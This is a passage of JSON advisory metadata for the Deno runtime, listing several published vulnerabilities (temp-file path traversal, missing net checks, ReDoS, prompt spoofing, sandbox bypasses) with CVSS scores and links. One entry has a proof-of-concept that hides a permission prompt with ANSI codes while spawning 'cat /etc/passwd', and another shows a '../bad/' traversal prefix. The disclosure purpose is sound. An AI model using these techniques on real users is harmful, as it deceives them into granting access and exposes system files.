APIs would allow for creation of files outside of the allowed directories. This may allow the user to overwrite important files on the system that may affect other systems.\n\nA user may provide a prefix or suffix to a `Deno.makeTemp*` API containing path traversal characters. The permission check would prompt for the base directory of the API, but the final file that was created would be outside of this directory:\n\n```\n$ mkdir /tmp/good\n$ mkdir /tmp/bad\n$ deno repl --allow-write=/tmp/good\n\u003e Deno.makeTempFileSync({ dir: \"/tmp/bad\" })\n┌ ⚠️  Deno requests write access to \"/tmp/bad\".\n├ Requested by `Deno.makeTempFile()` API.\n├ Run again with --allow-write to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all write permissions) \u003e n\n❌ Denied write access to \"/tmp/bad\".\nUncaught PermissionDenied: Requires write access to \"/tmp/bad\", run again with the --allow-write flag\n    at Object.makeTempFileSync (ext:deno_fs/30_fs.js:176:10)\n    at \u003canonymous\u003e:1:27\n\u003e Deno.makeTempFileSync({ dir: \"/tmp/good\", prefix: \"../bad/\" })\n\"/tmp/good/../bad/a9432ef5\"\n$ ls -l /tmp/bad/a9432ef5\n-rw-------@ 1 user  group  0 Mar  4 09:20 /tmp/bad/a9432ef5\n```\n\n### Patches\n\nThis is fixed in Deno 1.41.1.\n\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-03-05T16:19:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-hrqr-jv8w-v9jh","https://nvd.nist.gov/vuln/detail/CVE-2024-27931","https://github.com/advisories/GHSA-hrqr-jv8w-v9jh"],"source_kind":"github","identifiers":["GHSA-hrqr-jv8w-v9jh","CVE-2024-27931"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-05T18:04:51.445Z","updated_at":"2026-08-29T17:07:53.526Z","epss_percentage":0.00491,"epss_percentile":0.39543,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.41.1","vulnerable_version_range":"\u003c 1.41.1"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","url":"https://github.com/advisories/GHSA-vc52-gwm3-8v2f","title":"Missing \"--allow-net\" permission check for built-in Node modules","description":"### Impact\n\nOutbound HTTP requests made using the built-in \"node:http\" or \"node:https\" modules are incorrectly not checked against the network permission allow list (`--allow-net`). Dependencies relying on these built-in modules are subject to the vulnerability too.\n\nUsers of Deno versions prior to 1.34.0 are unaffected. Deno Deploy users are unaffected.\n\n### Patches\n\nThis problem has been patched in Deno v1.34.1 and all users are recommended to update to this version.\n\n### Workarounds\n\nNo workaround is available for this issue.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-05-31T23:39:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-vc52-gwm3-8v2f","https://nvd.nist.gov/vuln/detail/CVE-2023-33966","https://github.com/denoland/deno/releases/tag/v1.34.1","https://github.com/advisories/GHSA-vc52-gwm3-8v2f"],"source_kind":"github","identifiers":["GHSA-vc52-gwm3-8v2f","CVE-2023-33966"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-06-01T00:03:15.490Z","updated_at":"2026-09-08T21:11:39.497Z","epss_percentage":0.00625,"epss_percentile":0.47751,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.115.0","vulnerable_version_range":"= 0.114.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.34.1","vulnerable_version_range":"= 1.34.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy","url":"https://github.com/advisories/GHSA-jc97-h3h9-7xh6","title":"Regular Expression Denial of Service in Deno.upgradeWebSocket API","description":"### Impact\nVersions of the package deno before 1.31.0 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the upgradeWebSocket function, which contains regexes in the form of /s*,s*/, used for splitting the Connection/Upgrade header. A specially crafted Connection/Upgrade header can be used to significantly slow down a web socket server. \n\n### Patches\nIt is recommended that users upgrade to Deno 1.31.0.\n\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-04-03T17:18:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6","https://nvd.nist.gov/vuln/detail/CVE-2023-26103","https://github.com/denoland/deno/pull/17722","https://github.com/denoland/deno/commit/cf06a7c7e672880e1b38598fe445e2c50b4a9d06","https://github.com/denoland/deno/blob/2b247be517d789a37e532849e2e40b724af0918f/ext/http/01_http.js#L395-L409","https://github.com/denoland/deno/releases/tag/v1.31.0","https://security.snyk.io/vuln/SNYK-RUST-DENO-3315970","https://github.com/advisories/GHSA-jc97-h3h9-7xh6"],"source_kind":"github","identifiers":["GHSA-jc97-h3h9-7xh6","CVE-2023-26103"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-04-03T18:03:21.228Z","updated_at":"2026-09-08T21:11:49.078Z","epss_percentage":0.01229,"epss_percentile":0.66938,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.0","vulnerable_version_range":"\u003e= 1.12.0, \u003c 1.31.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qYzk3LWgzaDktN3hoNs4AAygy/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","url":"https://github.com/advisories/GHSA-vq67-rp93-65qf","title":"Interactive `run` permission prompt spoofing via improper ANSI neutralization","description":"### Summary\nArbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text.\n\n### Details\n\nThe main entry point comes down to the ability to override what the API control says ([40_process.js](https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175)). Because of ANSI code's ability to clear lines, a malicious program can clear the last 2 lines of the prompt and put their own header. This also works in `op_kill`.\n\n### PoC\n\nThis PoC works on 1.31.1, but modified versions of it work on older versions.\n\nMake a file, e.g. `index.ts`, that uses this vulnerability to spoof the `op_spawn_child` permission prompt\n\n```ts\nconst boldANSI = \"\\u001b[1m\" // bold\nconst unboldANSI = \"\\u001b[22m\" // unbold\n\nconst prompt = `┌ ⚠️  ${boldANSI}Deno requests run access to \"echo\"${unboldANSI}\n├ Requested by \\`Deno.Command().output()`\n\nconst moveANSIUp = \"\\u001b[1A\" // moves to the start of the line\nconst clearANSI = \"\\u001b[2K\" // clears the line\nconst moveANSIStart = \"\\u001b[1000D\" // moves to the start of the line\n\nDeno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({\n    cmd: \"cat\",\n    args: [\"/etc/passwd\"],\n    clearEnv: false,\n    env: [],\n    stdin: \"null\",\n    stdout: \"inherit\",\n    stderr: \"piped\"\n}, moveANSIUp + clearANSI + moveANSIStart + prompt)\n```\n\nRun the file with `deno run index.ts`.\n\n### Impact\nAny Deno program is able to spoof the interactive permission prompt for the `op_spawn_child` or the `op_kill` action (which indirectly gives access to all run commands) by overriding the `Requested by {message} API` with their own ANSI codes, allowing them to clear the latter prompt and change it to whatever they needed:\n\n```\n// Expected Prompt\n┌ ⚠️  Deno requests run access to \"cat\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n\n// Actual Prompt\n┌ ⚠️  Deno requests run access to \"echo\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n```\n\nThis works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run.\n\nThis problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers).\n\nBefore `v1.31.0`, this requires the `--unstable` flag. \n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-03-24T22:06:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf","https://nvd.nist.gov/vuln/detail/CVE-2023-28446","https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175","https://github.com/denoland/deno/releases/tag/v1.31.2","https://github.com/advisories/GHSA-vq67-rp93-65qf"],"source_kind":"github","identifiers":["GHSA-vq67-rp93-65qf","CVE-2023-28446"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T23:03:48.690Z","updated_at":"2026-09-03T07:12:47.317Z","epss_percentage":0.01132,"epss_percentile":0.6422,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno_runtime"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","url":"https://github.com/advisories/GHSA-c25x-cm9x-qqgx","title":"Deno improperly handles resizable ArrayBuffer","description":"### Impact\n\n[Resizable ArrayBuffers](https://github.com/tc39/proposal-resizablearraybuffer) passed to asynchronous native functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write.\n\nIt is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0.\n\nDeno Deploy users are not affected.\n\n### Patches\n\nThe problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. A future version of Deno will re-enable resizable ArrayBuffers with a proper fix.\n\n### Workarounds\n\nUpgrade to Deno 1.32.1, or run with `--v8-flags=--no-harmony-rab-gsab` to disable resizable ArrayBuffers.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-03-23T23:13:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.9,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx","https://github.com/denoland/deno/pull/18395","https://github.com/denoland/deno/releases/tag/v1.32.1","https://nvd.nist.gov/vuln/detail/CVE-2023-28445","https://github.com/denoland/deno/pull/18452","https://github.com/advisories/GHSA-c25x-cm9x-qqgx"],"source_kind":"github","identifiers":["GHSA-c25x-cm9x-qqgx","CVE-2023-28445"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T00:03:53.363Z","updated_at":"2026-09-08T21:11:42.176Z","epss_percentage":0.00971,"epss_percentile":0.59653,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.103.0","vulnerable_version_range":"= 0.102.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"serde_v8","versions":[{"first_patched_version":"0.88.0","vulnerable_version_range":"= 0.87.0"}],"purl":"pkg:cargo/serde_v8"},{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.32.1","vulnerable_version_range":"= 1.32.0"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0","url":"https://github.com/advisories/GHSA-xr9w-x6gw-c9mj","title":"Duplicate advisory: Deno vulnerable to Regular Expression Denial of Service","description":"## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of [GHSA-jc97-h3h9-7xh6](https://github.com/advisories/GHSA-jc97-h3h9-7xh6). This link is maintained to preserve external references.\n\n## Original Description\nVersions of the package deno before 1.31.0 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the upgradeWebSocket function, which contains regexes in the form of /s*,s*/, used for splitting the Connection/Upgrade header. A specially crafted Connection/Upgrade header can be used to significantly slow down a web socket server. This issue has been patched in version 1.31.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-02-25T06:30:21.000Z","withdrawn_at":"2023-04-03T17:18:44.000Z","classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-26103","https://github.com/denoland/deno/pull/17722","https://github.com/denoland/deno/commit/cf06a7c7e672880e1b38598fe445e2c50b4a9d06","https://github.com/denoland/deno/blob/2b247be517d789a37e532849e2e40b724af0918f/ext/http/01_http.js%23L395-L409","https://github.com/denoland/deno/releases/tag/v1.31.0","https://security.snyk.io/vuln/SNYK-RUST-DENO-3315970","https://github.com/advisories/GHSA-xr9w-x6gw-c9mj"],"source_kind":"github","identifiers":["GHSA-xr9w-x6gw-c9mj"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-02-28T15:03:26.646Z","updated_at":"2026-09-03T07:12:55.577Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.0","vulnerable_version_range":"\u003c 1.31.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjl3LXg2Z3ctYzltas4AAxz0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx","url":"https://github.com/advisories/GHSA-mc52-jpm2-cqh6","title":"Deno is vulnerable to race condition via interactive permission prompt spoofing","description":"### Impact\n\nMulti-threaded programs were able to spoof interactive permission prompt by rewriting the prompt to suggest that program is waiting on user confirmation to unrelated action. \n\nA malicious program could clear the terminal screen after permission prompt was shown and write a generic message like so:\n```\n// Expected prompt\n⚠️  ┌ Deno requests read access to \"./log.txt\".\n   ├ Requested by `Deno.open()` API\n   ├ Run again with --allow-read to bypass this prompt.\n   └ Allow? [y/n] (y = yes, allow; n = no, deny) \u003e\n\n// Prompt that users would see\nDo you want to continue?\n```\n\nThis situation impacts users who use Web Worker API and relied on interactive permission prompt. The reproduction is very timing sensitive and can’t be reliably reproduced on every try.\n\nThis problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers). \n\n### Patches\n\nThe problem has been fixed in Deno v1.29.3; it is recommended all users update to this version.\n\n### Workarounds\n\nRun with `--no-prompt` flag to disable interactive permission prompts.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-01-20T16:56:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-mc52-jpm2-cqh6","https://nvd.nist.gov/vuln/detail/CVE-2023-22499","https://github.com/denoland/deno/pull/17392","https://github.com/advisories/GHSA-mc52-jpm2-cqh6"],"source_kind":"github","identifiers":["GHSA-mc52-jpm2-cqh6","CVE-2023-22499"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-01-20T17:03:28.409Z","updated_at":"2026-09-08T21:11:49.073Z","epss_percentage":0.00601,"epss_percentile":0.46577,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.29.3","vulnerable_version_range":"\u003e= 1.9.0, \u003c 1.29.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tYzUyLWpwbTItY3FoNs4AAxFx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf","url":"https://github.com/advisories/GHSA-67hm-27mx-9cg7","title":"Link Following in Deno","description":"Deno \u003c=1.14.0 file sandbox does not handle symbolic links correctly. When running Deno with specific write access, the Deno.symlink method can be used to gain access to any directory.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-06-13T00:00:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-41641","https://github.com/denoland/deno/issues/12152","https://hackers.report/report/614876917a7b150012836bb8","https://github.com/denoland/deno/pull/12554","https://github.com/denoland/deno/commit/d44011a69e0674acfa9c59bd7ad7f0523eb61d42","https://github.com/advisories/GHSA-67hm-27mx-9cg7"],"source_kind":"github","identifiers":["GHSA-67hm-27mx-9cg7","CVE-2021-41641"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2022-12-21T16:12:17.575Z","updated_at":"2026-09-03T07:14:09.204Z","epss_percentage":0.00382,"epss_percentile":0.30964,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.16.0","vulnerable_version_range":"\u003c 1.16.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02N2htLTI3bXgtOWNnN84AArgf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA","url":"https://github.com/advisories/GHSA-838h-jqp6-cf2f","title":"Sandbox bypass leading to arbitrary code execution in Deno","description":"### Impact\n\nThe versions of Deno between release 1.18.0 and 1.20.2 (inclusive) are vulnerable to an attack where a malicious actor controlling the code executed in a Deno runtime could bypass permission checks and execute arbitrary shell code.\n\nThere is **no** evidence that this vulnerability has been exploited in the wild.\n\nThis vulnerability does **not** affect users of Deno Deploy.\n\n### Patches\n\nThe vulnerability has been patched in Deno 1.20.3.\n\n### Workarounds\n\nThere is no workaround. All users are recommended to upgrade to 1.20.3 immediately\n\n---\n\nThe cause of this error was that certain FFI operations did not correctly check for permissions. The issue was fixed in [this](https://github.com/denoland/deno/pull/14115) pull request.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2022-03-29T22:10:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":10.0,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-838h-jqp6-cf2f","https://nvd.nist.gov/vuln/detail/CVE-2022-24783","https://github.com/denoland/deno/releases/tag/v1.20.3","https://github.com/denoland/deno/pull/14115","https://github.com/denoland/deno/commit/fcfce1bb869fddc629e6d889d6ba1328b80b0dcf","https://github.com/denoland/deno/compare/v1.20.2...v1.20.3","https://github.com/advisories/GHSA-838h-jqp6-cf2f"],"source_kind":"github","identifiers":["GHSA-838h-jqp6-cf2f","CVE-2022-24783"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2022-12-21T16:12:31.502Z","updated_at":"2026-09-08T21:13:15.540Z","epss_percentage":0.01147,"epss_percentile":0.64694,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.20.3","vulnerable_version_range":"\u003e= 1.18.0, \u003c 1.20.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g","url":"https://github.com/advisories/GHSA-xpwj-7v8q-mcgj","title":"Deno's static imports inside dynamically imported modules do not adhere to permission checks","description":"### Impact\n\nModules that are dynamically imported through `import()` or `new Worker` might have been able to bypass network and file system permission checks when statically importing other modules. In Deno 1.5.x and 1.6.x only programs dynamically importing (especially transitively) untrusted code are affected. In Deno 1.7.x all programs importing (especially transitively) untrusted code are affected.\n\nIn effect an attacker in control of a (possibly remote) module in a programs module graph has been able to, **irrespective of permissions**:\n1. initiate GET requests to arbitrary URLs on the internet (including LAN) and possibly read (parts of) the contents of these resources.\n2. check for existence of arbitrary paths on the file system, and possibly read (parts of) the contents of these files.\n\nIn Deno 1.5.x (October 27th, 2020) and Deno 1.6.x (December 8th, 2020) the attacker module had to have been granted permissions to load dynamically through the network / fs read permission. Since Deno 1.7.x (January 19th, 2021) this vulnerability was able to be exploited in a fully sandboxed isolate (without any permissions). This vulnerability was not present in releases prior to 1.5.0.\n\nArbitrary non-GET requests, control over request headers, or file system writes are not possible through this vulnerability. Users of the `deno_core`, `deno_runtime`, or other `deno_*` crates are not affected. This is a Deno CLI only vulnerability.\n\nWe are relatively confident this was not abused in the wild, as by default Deno prints out a green \"Download\" message when remote imports are downloaded, and this would have caused suspicion if it occurred in the middle of a programs execution. This message can be silenced with the `--quiet` flag.  \n\n### Patches\n\nThe vulnerability has been patched in Deno release 1.10.2. You can upgrade to the latest Deno version by running the `deno upgrade` command. The release is available through all official download channels. \n\n### Workarounds\n\nThere is no workaround for this issue.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue on [the issue tracker](https://github.com/denoland/deno)\n* Discuss on [Discord](https://discord.gg/deno)\n","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2021-09-23T23:18:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-xpwj-7v8q-mcgj","https://nvd.nist.gov/vuln/detail/CVE-2021-32619","https://github.com/advisories/GHSA-xpwj-7v8q-mcgj"],"source_kind":"github","identifiers":["GHSA-xpwj-7v8q-mcgj","CVE-2021-32619"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2022-12-21T16:12:46.343Z","updated_at":"2026-09-08T21:13:45.837Z","epss_percentage":0.01113,"epss_percentile":0.63835,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.10.2","vulnerable_version_range":"\u003e= 1.5.0, \u003c= 1.10.1"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno","docker_dependents_count":6,"docker_downloads_count":451,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/ap